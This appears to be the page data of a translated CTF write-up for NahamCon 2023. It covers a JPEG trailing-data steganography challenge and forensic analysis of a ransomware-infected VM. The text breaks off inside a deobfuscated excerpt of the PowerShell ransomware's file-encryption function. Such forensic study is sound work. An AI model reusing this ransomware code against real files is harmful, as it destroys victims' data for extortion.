{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-nahamCon-2023-en","result":{"data":{"markdownRemark":{"id":"7bc52c59-8137-5d7b-b62e-88ae81530df2","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-nahamCon-2023\">original page</a>.</p>\n</blockquote>\n<p>I participated in NahamCon CTF 2023 with team 0nePadding and finished 74th out of 2522 teams.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/596145304cb456e1760d24d766be8d23/511f0/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 56.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAACcklEQVQoz31SS08TYRT95tF22plO2+kLaC0llRgCEqNQVFbowqWE2KJtoXWmlEqCKAhqDTFlJ6YLfoCJG6L4IiHduTBBi49EYAG/53i/sawkLk7mzrn3O/fJGGMYGhpCZWYGpmlC1TRw7r+QZZyJx6EoCiLRKMKqipjHc+JnSKfTKFcqmC4VobYdIacLlzwqzhOGjRDShAu6H8OajqggIpZIwAgEEOnoQMjtRtzlgkCJGBMEXB0ZQWHsGirZLIKhkC0YJzTO9ePV9RuodaewFOnCy4tpNHr7cCfV+0/VosMBNwkzjVoMk0i6fwC15WWsrq4in8tRtSU8Xavj2doabmYzGJ+cxGPyVR8+QGNjA6XpaRTyeTtW93qhUIW6roMZhmHPgskSxjMZ3F9cRK5YxPN6HY8owcDgIMxyGS/W17FAPs49qdUwRQmXVlbwenMTASqIawRoBCxIghopd9Ks+hQPwkxAgmakUhs6oYvQIzsQpW9Ckm0uKko2n3R7cOvyFSRUDbxTXhzjqiptSecbczoRpsedDid0SYJKDw36D5BtkFgn2V5RhI/+g2QHiQuScERx29fh9/vBvNQ/H6bIN0SBfEmSQvOgRF6fD1obXgrWCD7O+31w8WsgceaQ7YXwlrkW44aDCJE7T7k5uc130L2dTaXQk0yeGuek7v7ugioTqCpO3p6YwFxlFgvVKu7mCjDzU7hnlVEtlmDRRq3CFKqWCcssYX7WwlzZwvxMBd2xmP2eF8ZOxATCzvsP+L1/iOPDAzS3m9h+t4O93RY+N5v4+OYtPm1tofXtK760dnF89BO/fnzH0f4BxkZHbQ2JRvYHXjZOfKkmRHcAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/596145304cb456e1760d24d766be8d23/8ac56/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.webp 240w,\n/static/596145304cb456e1760d24d766be8d23/d3be9/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.webp 480w,\n/static/596145304cb456e1760d24d766be8d23/e46b2/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.webp 960w,\n/static/596145304cb456e1760d24d766be8d23/40d03/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.webp 1172w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/596145304cb456e1760d24d766be8d23/8ff5a/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.png 240w,\n/static/596145304cb456e1760d24d766be8d23/e85cb/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.png 480w,\n/static/596145304cb456e1760d24d766be8d23/d9199/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.png 960w,\n/static/596145304cb456e1760d24d766be8d23/511f0/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.png 1172w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/596145304cb456e1760d24d766be8d23/d9199/88dae4383f32af97250a757e1e8b98aa5a5a5ca32d5d3962a0a52d9bb5a6f87c.png\"\n            alt=\"img\"\n            title=\"img\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Unfortunately the Rev challenges were too difficult for me to solve on my own this time, but I got to tackle some very interesting Forensic incident-response problems.</p>\n<p>There were also some Mobile challenges I didn’t have time for — I plan to come back to those later.</p>\n<h2 id=\"tiny-little-fibers-warmup\" style=\"position:relative;\"><a href=\"#tiny-little-fibers-warmup\" aria-label=\"tiny little fibers warmup permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>tiny little fibers (Warmup)</h2>\n<blockquote>\n<p>Oh wow, it’s another of everyone’s favorite. But we like to try and turn the ordinary into <em>extraordinary!</em></p>\n</blockquote>\n<p>The challenge provided the following image as the problem binary.</p>\n<p>Reverse image search showed it to be a publicly available photo, so rather than steganography I suspected some data had been appended directly to the image file, and began investigating.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6e161606af464bfd50c68ac973049982/c7a90/tiny-little-fibers.jpg\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 66.66666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAANABQDASIAAhEBAxEB/8QAFwAAAwEAAAAAAAAAAAAAAAAAAAEDAv/EABUBAQEAAAAAAAAAAAAAAAAAAAAD/9oADAMBAAIQAxAAAAGry5UoQD//xAAbEAACAgMBAAAAAAAAAAAAAAABAgARAyIxQf/aAAgBAQABBQLjE7XPGi5LH//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQMBAT8BP//EABQRAQAAAAAAAAAAAAAAAAAAABD/2gAIAQIBAT8BP//EABYQAQEBAAAAAAAAAAAAAAAAABABgf/aAAgBAQAGPwKOv//EABoQAAIDAQEAAAAAAAAAAAAAAAABESExQWH/2gAIAQEAAT8hc01sT4VE+8HDk+jzNilDMT//2gAMAwEAAgADAAAAEHff/8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAwEBPxA//8QAFBEBAAAAAAAAAAAAAAAAAAAAEP/aAAgBAgEBPxA//8QAGhABAQEBAAMAAAAAAAAAAAAAAREhADFBYf/aAAgBAQABPxDOIunxRvCLQ2zv2PXwZdBzp4HKcNmi+t4spopj3//Z'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6e161606af464bfd50c68ac973049982/8ac56/tiny-little-fibers.webp 240w,\n/static/6e161606af464bfd50c68ac973049982/d3be9/tiny-little-fibers.webp 480w,\n/static/6e161606af464bfd50c68ac973049982/e46b2/tiny-little-fibers.webp 960w,\n/static/6e161606af464bfd50c68ac973049982/f992d/tiny-little-fibers.webp 1440w,\n/static/6e161606af464bfd50c68ac973049982/882b9/tiny-little-fibers.webp 1920w,\n/static/6e161606af464bfd50c68ac973049982/27d84/tiny-little-fibers.webp 2056w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6e161606af464bfd50c68ac973049982/09b79/tiny-little-fibers.jpg 240w,\n/static/6e161606af464bfd50c68ac973049982/7cc5e/tiny-little-fibers.jpg 480w,\n/static/6e161606af464bfd50c68ac973049982/6a068/tiny-little-fibers.jpg 960w,\n/static/6e161606af464bfd50c68ac973049982/644c5/tiny-little-fibers.jpg 1440w,\n/static/6e161606af464bfd50c68ac973049982/0f98f/tiny-little-fibers.jpg 1920w,\n/static/6e161606af464bfd50c68ac973049982/c7a90/tiny-little-fibers.jpg 2056w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/jpeg\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6e161606af464bfd50c68ac973049982/6a068/tiny-little-fibers.jpg\"\n            alt=\"tiny-little-fibers\"\n            title=\"tiny-little-fibers\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Uploading the image to <a href=\"https://www.aperisolve.com/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Aperi’Solve</a> returned nothing useful.</p>\n<p>So I tried stegoveritas:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Install stegoveritas</span>\npip3 <span class=\"token function\">install</span> stegoveritas\nstegoveritas_install_deps\n\n<span class=\"token comment\"># Analyze with stegoveritas</span>\nstegoveritas tiny-little-fibers.jpg</code></pre></div>\n<p>Reference: <a href=\"https://github.com/bannsec/stegoVeritas\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">bannsec/stegoVeritas: Yet another Stego Tool</a></p>\n<p>Reading the binary of the file saved as <code class=\"language-text\">trailing_data.bin</code>, I was able to retrieve the Flag string (likely manipulated to make it harder to find with <code class=\"language-text\">strings</code>):</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7e7124b89d0455e9d05611b50841b76e/1843f/image-20230618120537122.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 18.75%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA0ElEQVQI12NwM3byNnZz13X30Pd003V31/XwMvBy1nKxkLGwlrU0kzTV5tXW49exEDWwlzZ2lDd3kDW1EtO3Fjcw5FZliDDzSXIOT3QOS3QOjbMPirULSnaNjLT09dKwAyIXBXM9dgVDTmV9DiVddkUddgUgqcehBEQGXCoMwSaeUTYBUTaB0bZBQDLc0g/ICDbxcpAzs5M2thLX1+dUBqoDIW4VoG1AEsoFao6w9ItzDEl0iYhzDAOyY+2DE5zDw8x97KSMXJWs7KVN4EoxEQBKrTDhMo7gNgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7e7124b89d0455e9d05611b50841b76e/8ac56/image-20230618120537122.webp 240w,\n/static/7e7124b89d0455e9d05611b50841b76e/d3be9/image-20230618120537122.webp 480w,\n/static/7e7124b89d0455e9d05611b50841b76e/e46b2/image-20230618120537122.webp 960w,\n/static/7e7124b89d0455e9d05611b50841b76e/f52fe/image-20230618120537122.webp 1186w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7e7124b89d0455e9d05611b50841b76e/8ff5a/image-20230618120537122.png 240w,\n/static/7e7124b89d0455e9d05611b50841b76e/e85cb/image-20230618120537122.png 480w,\n/static/7e7124b89d0455e9d05611b50841b76e/d9199/image-20230618120537122.png 960w,\n/static/7e7124b89d0455e9d05611b50841b76e/1843f/image-20230618120537122.png 1186w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7e7124b89d0455e9d05611b50841b76e/d9199/image-20230618120537122.png\"\n            alt=\"image-20230618120537122\"\n            title=\"image-20230618120537122\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>As for how <code class=\"language-text\">trailing_data.bin</code> was extracted — reading the tool’s source code shows it walks through JPEG markers, and once it finds <code class=\"language-text\">\\xff\\xda</code> (Start of Scan), it finds the range from there to <code class=\"language-text\">\\xff\\xd9</code> (end marker) and writes any trailing data after the end marker to a file:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\"># These markers don't have a length attribute</span>\nnonLenMarkers <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span> <span class=\"token string\">b'\\xff\\xd8'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xff\\x01'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xffd0'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xffd1'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xffd2'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xffd3'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xffd4'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xffd5'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xffd6'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b'\\xffd7'</span> <span class=\"token punctuation\">]</span>\n\n<span class=\"token comment\"># Open up the file</span>\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>image<span class=\"token punctuation\">.</span>veritas<span class=\"token punctuation\">.</span>file_name<span class=\"token punctuation\">,</span><span class=\"token string\">\"rb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> myFile<span class=\"token punctuation\">:</span>\n    steg <span class=\"token operator\">=</span> myFile<span class=\"token punctuation\">.</span>read<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span>\n    <span class=\"token comment\"># Grab the current header</span>\n    hdr <span class=\"token operator\">=</span> steg<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">:</span>i<span class=\"token operator\">+</span><span class=\"token number\">2</span><span class=\"token punctuation\">]</span>\n\n    <span class=\"token comment\"># if Start of Image, Temporary Private, Restart, things that don't have an associated length field</span>\n    <span class=\"token keyword\">if</span> hdr <span class=\"token keyword\">in</span> nonLenMarkers<span class=\"token punctuation\">:</span>\n            <span class=\"token comment\"># Just move to the next marker</span>\n            i <span class=\"token operator\">=</span> i <span class=\"token operator\">+</span> <span class=\"token number\">2</span>\n            <span class=\"token keyword\">continue</span>\n\n    <span class=\"token comment\"># If we've found our way to the end of the jpeg</span>\n    <span class=\"token keyword\">if</span> hdr <span class=\"token operator\">==</span> <span class=\"token string\">b'\\xff\\xd9'</span><span class=\"token punctuation\">:</span>\n            <span class=\"token comment\">#print(\"Made it to the end!\")</span>\n            <span class=\"token comment\"># Increment 2 so we can check the length</span>\n            i <span class=\"token operator\">+=</span> <span class=\"token number\">2</span>\n            <span class=\"token keyword\">break</span>\n\n    <span class=\"token comment\"># Unpack the length field</span>\n    ln <span class=\"token operator\">=</span> unpack<span class=\"token punctuation\">(</span><span class=\"token string\">\">H\"</span><span class=\"token punctuation\">,</span>steg<span class=\"token punctuation\">[</span>i<span class=\"token operator\">+</span><span class=\"token number\">2</span><span class=\"token punctuation\">:</span>i<span class=\"token operator\">+</span><span class=\"token number\">4</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span>\n\n    <span class=\"token comment\"># print(\"Found Length: {0}\".format(ln))</span>\n\n    <span class=\"token comment\"># Update the index with the known length</span>\n    i <span class=\"token operator\">=</span> i<span class=\"token operator\">+</span>ln<span class=\"token operator\">+</span><span class=\"token number\">2</span>\n\n    <span class=\"token comment\"># When we hit scan data, we scan to the end of the format</span>\n    <span class=\"token keyword\">if</span> hdr <span class=\"token operator\">==</span> <span class=\"token string\">b'\\xff\\xda'</span><span class=\"token punctuation\">:</span>\n        <span class=\"token comment\">#print(\"Start of Scan data\")</span>\n        <span class=\"token comment\"># Find the end marker</span>\n        i <span class=\"token operator\">+=</span> steg<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">:</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>index<span class=\"token punctuation\">(</span><span class=\"token string\">b'\\xff\\xd9'</span><span class=\"token punctuation\">)</span>\n\n    <span class=\"token comment\"># Check for trailers</span>\n    <span class=\"token keyword\">if</span> i <span class=\"token operator\">!=</span> <span class=\"token builtin\">len</span><span class=\"token punctuation\">(</span>steg<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Trailing Data Discovered... Saving\"</span><span class=\"token punctuation\">)</span>\n        <span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>steg<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">:</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n        <span class=\"token comment\"># Save it off for reference</span>\n        <span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span>output_file<span class=\"token punctuation\">,</span> <span class=\"token string\">\"wb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> outFile<span class=\"token punctuation\">:</span>\n            outFile<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>steg<span class=\"token punctuation\">[</span>i<span class=\"token punctuation\">:</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Reference: <a href=\"https://github.com/bannsec/stegoVeritas/blob/master/stegoveritas/modules/image/analysis/trailing.py\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">stegoVeritas/stegoveritas/modules/image/analysis/trailing.py at master · bannsec/stegoVeritas · GitHub</a></p>\n<p>The <code class=\"language-text\">\\xff\\xda</code> marker is the SOS (Start of Scan) marker, which signals the beginning of Huffman-encoded compressed image data (with <code class=\"language-text\">\\xff\\xd9</code> as the end-of-image marker).</p>\n<p>While a JPEG normally contains a single SOS segment, it is possible to embed multiple SOS segments, and this is apparently used as a steganography technique.</p>\n<p>In this challenge, the Flag was hidden in the trailing data after the SOS segment.</p>\n<h2 id=\"ir-forensic\" style=\"position:relative;\"><a href=\"#ir-forensic\" aria-label=\"ir forensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>IR (Forensic)</h2>\n<h3 id=\"ir1\" style=\"position:relative;\"><a href=\"#ir1\" aria-label=\"ir1 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>IR1</h3>\n<blockquote>\n<p>Can you find the hidden file on this VM?</p>\n<p>This group of challenges uses the same single file download for each challenge. This is a very large file download (13GB) and will take some time to download.</p>\n</blockquote>\n<p>I started the provided OVA file in VirtualBox, but couldn’t log in because I didn’t know the password. (Apparently the password was publicly available on Discord — I wish it had been in the problem description!)</p>\n<p>Instead, I extracted the OVA file (which is actually a tar archive), converted the resulting VMDK file to VHDX with <code class=\"language-text\">qemu-img</code>, and mounted it locally to inspect the files.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Rename and extract the OVA, then convert to VHDX</span>\n<span class=\"token function\">mv</span> nahamcon.ova nahamcon.tar\n<span class=\"token function\">tar</span> -xvf nahamcon.tar\nqemu-img convert -f vmdk -O vhdx <span class=\"token string\">\"Nahamcon\\ Forensics\\ Challenge-disk001.vmdk\"</span> out.vhdx</code></pre></div>\n<p>Mounting <code class=\"language-text\">out.vhdx</code> on a local Windows machine lets you browse the victim machine’s files from the host Explorer.</p>\n<p>Exploring the victim’s folders revealed a hidden folder inside the user profile, which contained a ransom note. The first Flag was embedded in that ransom note.</p>\n<h3 id=\"ir2\" style=\"position:relative;\"><a href=\"#ir2\" aria-label=\"ir2 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>IR2</h3>\n<blockquote>\n<p>Can you figure out how the malware got onto the system?</p>\n</blockquote>\n<p>This challenge asked us to determine how the malware was delivered.</p>\n<p>I analyzed the mounted virtual hard disk’s event logs with Hayabusa, but could not find any event that clearly pointed to the malware infection vector.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">.<span class=\"token punctuation\">\\</span>hayabusa-2.5.1-win-x64.exe csv-timeline -d <span class=\"token string\">\"E:\\Windows\\System32\\winevt\\Logs\"</span> -o result.csv</code></pre></div>\n<p>After browsing through all the files and installed applications without success, it turned out the answer could be identified from an email visible in the UWP mail client application on the victim machine.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e5922ce6c45d2d579c6b9f5a28baedcd/7321b/image-20230618173028103.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 38.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABKElEQVQoz4VRXW/DIAzM//9zlaptfViyqVvbQEKBkISQzxv2xhT1YbN0MmB8nI9sWWZQbNuGeZ4xTRPnfVBtGAaEEBjjOHL23vN5AvVmzk9cXNeVG78Jl9gUYIyGNZYfWJblF3Q3rfc1Os9uooLWd36NEIaAqBXFi8Hz4YqqLqHUHc45dF2HpmkY1lr0fY/HyE5PBfLiFefzB+pa4a41dFTWuRGqtrCNRetaHvNREYGm2iM7vksc8ivj+CZwumjkookqt6igjeoNKyMr/goiY4VSW1ykQmUcbDdAtx7Ok+kjE+1VUU4fl0B78i6RZrdPGT2SMNHHJo4XBo81NhNZWZaQUqKqKs5KqWhLzedCCM5US+qZUIofzyIB/Xbyhvb0EeliGum/kb8AsUhsSsSo1+kAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e5922ce6c45d2d579c6b9f5a28baedcd/8ac56/image-20230618173028103.webp 240w,\n/static/e5922ce6c45d2d579c6b9f5a28baedcd/d3be9/image-20230618173028103.webp 480w,\n/static/e5922ce6c45d2d579c6b9f5a28baedcd/e46b2/image-20230618173028103.webp 960w,\n/static/e5922ce6c45d2d579c6b9f5a28baedcd/2754d/image-20230618173028103.webp 1184w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e5922ce6c45d2d579c6b9f5a28baedcd/8ff5a/image-20230618173028103.png 240w,\n/static/e5922ce6c45d2d579c6b9f5a28baedcd/e85cb/image-20230618173028103.png 480w,\n/static/e5922ce6c45d2d579c6b9f5a28baedcd/d9199/image-20230618173028103.png 960w,\n/static/e5922ce6c45d2d579c6b9f5a28baedcd/7321b/image-20230618173028103.png 1184w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e5922ce6c45d2d579c6b9f5a28baedcd/d9199/image-20230618173028103.png\"\n            alt=\"image-20230618173028103\"\n            title=\"image-20230618173028103\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This was hard to find from just the filesystem, confirming that for this type of challenge you really do need to access the VM directly at some point.</p>\n<h3 id=\"ir3\" style=\"position:relative;\"><a href=\"#ir3\" aria-label=\"ir3 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>IR3</h3>\n<blockquote>\n<p>Can you reverse the malware?</p>\n</blockquote>\n<p>Searching the victim machine’s USERPROFILE directory turned up an obfuscated PowerShell script named <code class=\"language-text\">updates.ps1</code>.</p>\n<p>Manually deobfuscating it yields the following script (excerpt):</p>\n<div class=\"gatsby-highlight\" data-language=\"powershell\"><pre class=\"language-powershell\"><code class=\"language-powershell\"><span class=\"token keyword\">function</span> encryptFiles<span class=\"token punctuation\">{</span>\n<span class=\"token keyword\">Param</span><span class=\"token punctuation\">(</span>\n<span class=\"token namespace\">[Parameter(Mandatory=${true}, position=0)]</span>\n<span class=\"token namespace\">[string]</span> <span class=\"token variable\">$baseDirectory</span>\n<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">foreach</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$File</span> in <span class=\"token punctuation\">(</span><span class=\"token function\">Get-ChildItem</span> <span class=\"token variable\">$baseDirectory</span> <span class=\"token operator\">-</span>Recurse <span class=\"token operator\">-</span>File<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">{</span>\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$File</span><span class=\"token punctuation\">.</span>extension <span class=\"token operator\">-ne</span> <span class=\"token string\">\".enc\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">{</span>\n<span class=\"token variable\">$DestinationFile</span> = <span class=\"token variable\">$File</span><span class=\"token 